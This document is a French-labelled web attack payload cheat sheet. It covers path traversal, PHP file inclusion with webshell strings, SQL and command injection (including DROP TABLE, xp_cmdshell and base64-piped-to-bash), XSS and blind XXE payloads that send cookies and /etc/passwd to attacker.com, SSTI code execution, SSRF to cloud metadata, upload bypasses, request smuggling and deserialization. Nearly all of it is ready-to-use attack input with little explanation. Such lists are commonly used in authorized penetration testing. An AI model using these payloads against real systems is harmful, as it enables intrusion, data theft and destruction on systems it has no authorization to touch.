# Collection de Payloads pour Web Security

==================================================================
PATH TRAVERSAL
==================================================================

# Basic
../../../etc/passwd
..\..\..\windows\system32\drivers\etc\hosts

# URL Encoded
..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts

# Double URL Encoded
..%252f..%252f..%252fetc%252fpasswd

# Null Byte Bypass
../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
../../../etc/passwd%2500.jpg

# 16-bit Unicode Encoding
..%u002f..%u002f..%u002fetc%u002fpasswd

# UTF-8 Encoding
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

# With extension bypass
../../../../etc/passwd%00
../../../../etc/passwd%00.pdf
../../../../etc/passwd%00.png

# Absolute Path
/etc/passwd
C:\Windows\System32\drivers\etc\hosts

# UNC Path (Windows)
\\127.0.0.1\c$\windows\system32\drivers\etc\hosts

==================================================================
LOCAL FILE INCLUSION (PHP)
==================================================================

# PHP Filters
php://filter/convert.base64-encode/resource=index
php://filter/convert.base64-encode/resource=../config
php://filter/read=string.rot13/resource=index.php
php://filter/convert.iconv.utf-8.utf-16/resource=index.php

# php://input (avec POST data: <?php system($_GET['cmd']); ?>)
php://input

# data:// wrapper
data://text/plain,<?php system($_GET['cmd']); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

# expect:// (si activé)
expect://id
expect://ls

# Zip wrapper
zip://shell.jpg%23shell.php

# Log Poisoning
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log

# Session File Inclusion
/var/lib/php/sessions/sess_[PHPSESSID]

==================================================================
SQL INJECTION
==================================================================

# Authentication Bypass
admin' OR '1'='1
admin'--
admin' #
' OR 1=1--
' OR '1'='1'--
admin' OR '1'='1'--
') OR ('1'='1'--
' OR 1=1/*

# UNION Based
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT database(),user(),version()--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password,NULL FROM users--

# Error Based (MySQL)
' AND EXTRACTVALUE(1, CONCAT(0x7e, DATABASE(), 0x7e))--
' AND UPDATEXML(1, CONCAT(0x7e, DATABASE(), 0x7e), 1)--
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()), 0x7e))--
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT GROUP_CONCAT(username,0x3a,password) FROM users), 0x7e))--

# Boolean Based Blind
' AND 1=1--
' AND 1=2--
' AND SUBSTRING(DATABASE(),1,1)='a'--
' AND ASCII(SUBSTRING(DATABASE(),1,1))>97--

# Time Based Blind
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(SUBSTRING(DATABASE(),1,1)='a',SLEEP(5),0)--

# Stacked Queries
'; DROP TABLE users--
'; UPDATE users SET password='hacked' WHERE username='admin'--

# PostgreSQL
' OR 1=1--
'; SELECT version()--
' UNION SELECT NULL,NULL,NULL FROM pg_tables--

# MSSQL
' OR 1=1--
'; EXEC xp_cmdshell('whoami')--
' UNION SELECT NULL,NULL,NULL FROM sys.tables--

==================================================================
COMMAND INJECTION
==================================================================

# Basic Separators
; ls
& ls
&& ls
| ls
|| ls

# Newline
%0als
%0acat%20/etc/passwd

# Substitution
`ls`
$(ls)
`cat /etc/passwd`
$(cat /etc/passwd)

# Bypass Spaces
cat</etc/passwd
cat<>/etc/passwd
cat${IFS}/etc/passwd
cat$IFS$9/etc/passwd
cat%09/etc/passwd
cat%0a/etc/passwd
{cat,/etc/passwd}

# Bypass Keywords (cat)
c''at /etc/passwd
c""at /etc/passwd
c\at /etc/passwd
c$@at /etc/passwd
ca${u}t /etc/passwd
c${u}a${u}t${u} /etc/passwd

# Wildcards
/???/c?t /???/p??s??
/*/c*t /*/p*s*d
/bin/cat /e??/p*d

# Hex Encoding
$(echo 636174202f6574632f706173737764 | xxd -r -p)

# Base64 Encoding
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash
`echo Y2F0IC9ldGMvcGFzc3dk | base64 -d`

# Variables
$PATH
${PATH}
${HOME}
${PATH:0:1}  # /
a=l;b=s;$a$b  # ls

==================================================================
XSS (CROSS-SITE SCRIPTING)
==================================================================

# Basic
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

# IMG Tag
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img/src=x onerror=alert(1)>
<img src onerror=alert(1)>

# SVG
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg><script>alert(1)</script></svg>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>

# Body/HTML
<body onload=alert(1)>
<body onpageshow=alert(1)>
<frameset onload=alert(1)>

# Input
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<input type="text" value="x" onfocus="alert(1)" autofocus>

# Other Tags
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>

# Without Parentheses
<img src=x onerror=alert`1`>
<script>onerror=alert;throw 1</script>

# Without Spaces
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>

# Without Quotes
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<img src=x onerror=alert(document.domain)>

# Encoded
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>

# Bypass Filters
<img src=x onerror="eval(atob('YWxlcnQoMSk='))">
<img src=x onerror="window['ale'+'rt'](1)">
<img src=x onerror="this['al'+'ert'](1)">
<img src=x onerror="top['al'+'ert'](1)">

# Exfiltration
<img src=x onerror="fetch('https://attacker.com?c='+document.cookie)">
<script>document.location='https://attacker.com?c='+document.cookie</script>
<img src=x onerror="navigator.sendBeacon('https://attacker.com',document.cookie)">

# DOM XSS
# URL: https://site.com/page?name=<img src=x onerror=alert(1)>
# If innerHTML is used without sanitization

==================================================================
CSRF (CROSS-SITE REQUEST FORGERY)
==================================================================

# HTML Forms
<form action="https://target.com/change-email" method="POST">
  <input type="hidden" name="email" value="hacker@evil.com">
</form>
<script>document.forms[0].submit();</script>

# Without Token
<form action="https://target.com/change-password" method="POST">
  <input type="hidden" name="password" value="hacked123">
</form>

# With Empty Token
<form action="https://target.com/action" method="POST">
  <input type="hidden" name="csrf_token" value="">
  <input type="hidden" name="email" value="pwned@evil.com">
</form>

# No Referer
<html>
<head>
    <meta name="referrer" content="no-referrer">
</head>
<body>
    <form action="https://target.com/action" method="POST">
        <input type="hidden" name="email" value="pwned@evil.com">
    </form>
    <script>document.forms[0].submit();</script>
</body>
</html>

# Fetch API
<script>
fetch('https://target.com/change-email', {
    method: 'POST',
    body: 'email=pwned@evil.com',
    credentials: 'include'
});
</script>

# GET-based CSRF
<img src="https://target.com/delete-account?confirm=yes">
<iframe src="https://target.com/transfer?amount=1000&to=attacker"></iframe>

==================================================================
SERVER-SIDE TEMPLATE INJECTION (SSTI)
==================================================================

# Detection
{{7*7}}
${7*7}
<%= 7*7 %>
#{ 7*7 }
{{7*'7'}}

# Jinja2 (Python)
{{config}}
{{config.items()}}
{{''.__class__.__mro__}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()[414]('id',shell=True,stdout=-1).communicate()}}

# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("cat /etc/passwd")}}
{{["id"]|filter("system")}}

# Freemarker (Java)
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("cat /etc/passwd")}

# Tornado (Python)
{% import os %}{{os.popen("id").read()}}
{% import subprocess %}{{subprocess.check_output("id")}}

# ERB (Ruby)
<%= system("id") %>
<%= `id` %>
<%= IO.popen('id').readlines() %>

# Smarty (PHP)
{php}echo `id`;{/php}
{system('id')}

==================================================================
JWT (JSON WEB TOKEN)
==================================================================

# Algorithm None
{
  "alg": "none",
  "typ": "JWT"
}
{
  "user": "admin",
  "role": "admin"
}
# Result: eyJhbGc...eyJ1c2Vy....
# (signature vide après le dernier point)

# HS256 vs RS256 Confusion
# Obtenir la clé publique RSA
# Signer avec HS256 en utilisant la clé publique comme secret

# Weak Secret Brute Force
# Using jwt_tool
python3 jwt_tool.py <JWT> -C -d wordlist.txt

# Empty Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.

# Modified Payload
# Original: {"user":"john","role":"user"}
# Modified: {"user":"john","role":"admin"}

==================================================================
XXE (XML EXTERNAL ENTITY)
==================================================================

# Basic XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

# XXE to Retrieve Files
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY file SYSTEM "file:///etc/passwd" >]>
<data>&file;</data>

# XXE SSRF
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/admin">]>
<foo>&xxe;</foo>

# Blind XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
<foo></foo>

# evil.dtd content:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

==================================================================
LDAP INJECTION
==================================================================

# Authentication Bypass
*
*)(&
*)(|(objectClass=*)
admin)(&)
admin)(!(&(objectClass=*)

# Filter Bypass
*)(uid=*))(|(uid=*
*)(cn=*))%00

==================================================================
SSRF (SERVER-SIDE REQUEST FORGERY)
==================================================================

# Basic
http://localhost
http://127.0.0.1
http://0.0.0.0
http://[::1]

# Bypass Localhost Filter
http://127.1
http://127.0.1
http://2130706433 (decimal)
http://0177.0.0.1 (octal)
http://0x7f.0x00.0x00.0x01 (hex)
http://localhost.com
http://localtest.me

# Cloud Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://metadata.google.internal/computeMetadata/v1/

# With redirect
# Créer une page sur votre serveur qui redirige vers 169.254.169.254
# Utiliser bit.ly ou autre pour créer un short link

==================================================================
NOSQL INJECTION
==================================================================

# MongoDB Authentication Bypass
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": "admin", "password": {"$regex": ".*"}}

# In URL params
?username[$ne]=null&password[$ne]=null
?username[$gt]=&password[$gt]=

# Extract Data
{"username": "admin", "password": {"$regex": "^a.*"}}
{"username": "admin", "password": {"$regex": "^ab.*"}}

==================================================================
OPEN REDIRECT
==================================================================

# Basic
?redirect=https://evil.com
?url=https://evil.com
?next=https://evil.com
?return=https://evil.com

# Protocol Bypass
?redirect=//evil.com
?redirect=\/\/evil.com
?redirect=/\evil.com

# @ Symbol
?redirect=https://trusted.com@evil.com
?redirect=https://trusted.com%2540evil.com

# Subdomain
?redirect=https://evil.com.trusted.com

# Open Redirect to XSS
?redirect=javascript:alert(document.domain)
?redirect=data:text/html,<script>alert(1)</script>

==================================================================
FILE UPLOAD BYPASS
==================================================================

# Extension Bypass
shell.php
shell.php.jpg
shell.php%00.jpg
shell.php%0a.jpg
shell.php%0d%0a.jpg
shell.php%20
shell.php.
shell.pHp
shell.PhP

# Double Extension
shell.jpg.php
shell.php.jpg

# Null Byte
shell.php%00.jpg
shell.php\x00.jpg

# MIME Type Bypass
Content-Type: image/jpeg
(but upload shell.php)

# Magic Bytes
GIF89a; <?php system($_GET['cmd']); ?>

# .htaccess
AddType application/x-httpd-php .jpg

==================================================================
IDOR (INSECURE DIRECT OBJECT REFERENCE)
==================================================================

# Basic
/user/profile?id=1
/user/profile?id=2
/user/profile?id=999

# With UUID
/api/users/123e4567-e89b-12d3-a456-426614174000

# In Body
{"user_id": 1}
{"user_id": 2}

# Mass Assignment + IDOR
{"user_id": 1, "role": "admin"}

==================================================================
RACE CONDITION
==================================================================

# Coupon redemption
# Envoyer 100 requêtes simultanées pour utiliser le même coupon

# File upload
# Upload malicious file
# Access it before antivirus scan

# Money transfer
# Multiple simultaneous transfers with insufficient balance check

==================================================================
HTTP REQUEST SMUGGLING
==================================================================

# CL.TE
POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

# TE.CL
POST / HTTP/1.1
Host: vulnerable.com
Transfer-Encoding: chunked
Content-Length: 4

5c
SMUGGLED
0

==================================================================
CLICKJACKING
==================================================================

<style>
    iframe {
        position: relative;
        width: 500px;
        height: 700px;
        opacity: 0.00001;
        z-index: 2;
    }
    button {
        position: absolute;
        top: 300px;
        left: 60px;
        z-index: 1;
        width: 120px;
        height: 30px;
    }
</style>
<button>Click me</button>
<iframe src="https://vulnerable-site.com/delete-account"></iframe>

==================================================================
CACHE POISONING
==================================================================

# X-Forwarded-Host
GET / HTTP/1.1
Host: vulnerable.com
X-Forwarded-Host: evil.com

# Response:
# <link rel="stylesheet" href="//evil.com/styles.css">

==================================================================
DESERIALIZATION
==================================================================

# PHP
O:8:"evilclass":1:{s:4:"file";s:11:"/etc/passwd";}

# Python Pickle
cos
system
(S'id'
tR.

# Java
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ==...

==================================================================
END OF PAYLOADS
==================================================================

Note: Ces payloads sont à des fins éducatives uniquement.
Ne jamais utiliser sur des systèmes sans autorisation.
